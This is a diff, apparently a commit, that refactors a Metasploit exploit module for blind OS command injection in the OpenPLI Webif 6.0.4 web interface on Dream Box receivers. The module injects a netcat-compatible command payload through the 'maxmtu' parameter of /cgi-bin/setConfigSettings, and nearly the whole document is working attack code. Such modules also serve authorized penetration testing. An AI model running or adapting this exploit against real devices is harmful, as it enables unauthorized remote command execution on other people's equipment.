|
11 | 11 | class Metasploit3 < Msf::Exploit::Remote |
12 | 12 | Rank = GreatRanking |
13 | 13 |
|
14 | | - include Msf::Exploit::Remote::Tcp |
15 | 14 | include Msf::Exploit::Remote::HttpClient |
16 | 15 |
|
17 | 16 | def initialize(info = {}) |
18 | 17 | super(update_info(info, |
19 | | - 'Name' => 'OpenPLI Webif v6.0.4 - Arbitrary Command Execution', |
20 | | - 'Description' => %q{ |
21 | | - Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS Command injection. |
22 | | -
|
23 | | - Tested on the following box: |
24 | | - * Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) |
25 | | - #1 Wed Aug 17 23:54:07 CEST 2011 |
26 | | - * Firmware release 1.1.0, 27.01.2013 |
27 | | - * FP Firmware 1.06 |
28 | | - * Web Interface 6.0.4-Expert - PLi edition by [lite] |
29 | | -
|
30 | | - Note: This is a blind os command injection vulnerability. This means |
31 | | - that you will not see any output of your command. Try a ping command |
32 | | - to your local system for a first test. |
| 18 | + 'Name' => 'OpenPLI Webif Arbitrary Command Execution', |
| 19 | + 'Description' => %q{ |
| 20 | + Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command |
| 21 | + injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means |
| 22 | + that you will not see any output of your command. A ping command can be used for |
| 23 | + testing the vulnerability. This module has been tested in a box with the next |
| 24 | + features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 |
| 25 | + Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware |
| 26 | + 1.06 and Web Interface 6.0.4-Expert (PLi edition). |
33 | 27 | }, |
34 | | - 'Author' => [ 'm-1-k-3' ], |
35 | | - 'License' => MSF_LICENSE, |
36 | | - 'References' => |
| 28 | + 'Author' => [ 'm-1-k-3' ], |
| 29 | + 'License' => MSF_LICENSE, |
| 30 | + 'References' => |
37 | 31 | [ |
38 | | - [ 'URL', 'http://openpli.org/' ], |
39 | | - [ 'URL', 'http://openpli.org/wiki/Webif' ], |
40 | | - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ], |
41 | | - [ 'EDB', '24498' ], |
| 32 | + [ 'OSVDB', '90230' ], |
42 | 33 | [ 'BID', '57943' ], |
43 | | - [ 'OSVDB', '90230'] |
| 34 | + [ 'EDB', '24498' ], |
| 35 | + [ 'URL', 'http://openpli.org/wiki/Webif' ], |
| 36 | + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ] |
44 | 37 | ], |
45 | 38 | 'Platform' => ['unix', 'linux'], |
46 | | - 'Arch' => ARCH_CMD, |
47 | | - 'Privileged' => true, |
48 | | - 'Payload' => |
| 39 | + 'Arch' => ARCH_CMD, |
| 40 | + 'Privileged' => true, |
| 41 | + 'Payload' => |
49 | 42 | { |
50 | | - 'Space' => 1024, |
| 43 | + 'Space' => 1024, |
51 | 44 | 'DisableNops' => true, |
52 | | - 'Compat' => |
| 45 | + 'Compat' => |
53 | 46 | { |
54 | 47 | 'PayloadType' => 'cmd', |
55 | 48 | 'RequiredCmd' => 'netcat generic' |
56 | 49 | } |
57 | 50 | }, |
58 | | - 'Targets' => |
| 51 | + 'Targets' => |
59 | 52 | [ |
60 | 53 | [ 'Automatic Target', { }] |
61 | 54 | ], |
62 | 55 | 'DefaultTarget' => 0, |
63 | 56 | 'DisclosureDate' => 'Feb 08 2013' |
64 | 57 | )) |
65 | | - |
66 | | - register_options( |
67 | | - [ |
68 | | - Opt::RPORT(80), |
69 | | - ], self.class) |
70 | 58 | end |
71 | 59 |
|
72 | 60 | def exploit |
73 | | - connect |
74 | | - |
75 | | - payl = datastore['PAYLOAD'] |
76 | | - |
77 | | - uri = '/cgi-bin/setConfigSettings' |
78 | | - |
79 | | - cmd = Rex::Text.uri_encode(payload.encoded) |
80 | | - |
81 | | - vprint_status("#{rhost}:#{rport} - Sending remote command ... \nCommand: #{cmd}") |
82 | | - vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n") |
83 | | - |
84 | | - data_cmd = "?maxmtu=1500%26#{cmd}%26" |
85 | | - |
| 61 | + print_status("#{rhost}:#{rport} - Sending remote command...") |
| 62 | + vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") |
86 | 63 | begin |
87 | | - res = send_request_cgi( |
88 | | - { |
89 | | - 'uri' => uri << data_cmd, |
| 64 | + send_request_cgi( |
| 65 | + { |
| 66 | + 'uri' => normalize_uri("cgi-bin", "setConfigSettings"), |
90 | 67 | 'method' => 'GET', |
| 68 | + 'vars_get' => { |
| 69 | + "maxmtu" => "1500&#{payload.encoded}&" |
| 70 | + } |
91 | 71 | }) |
92 | 72 |
|
93 | 73 | rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT |
94 | | - print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting") |
95 | | - return |
96 | | - end |
97 | | - |
98 | | - if not res |
99 | | - print_error("#{rhost}:#{rport} - HTTP Connection Error, Aborting") |
100 | | - return |
| 74 | + fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting") |
101 | 75 | end |
102 | | - |
103 | | - handler |
104 | | - disconnect |
105 | 76 | end |
106 | 77 | end |
0 commit comments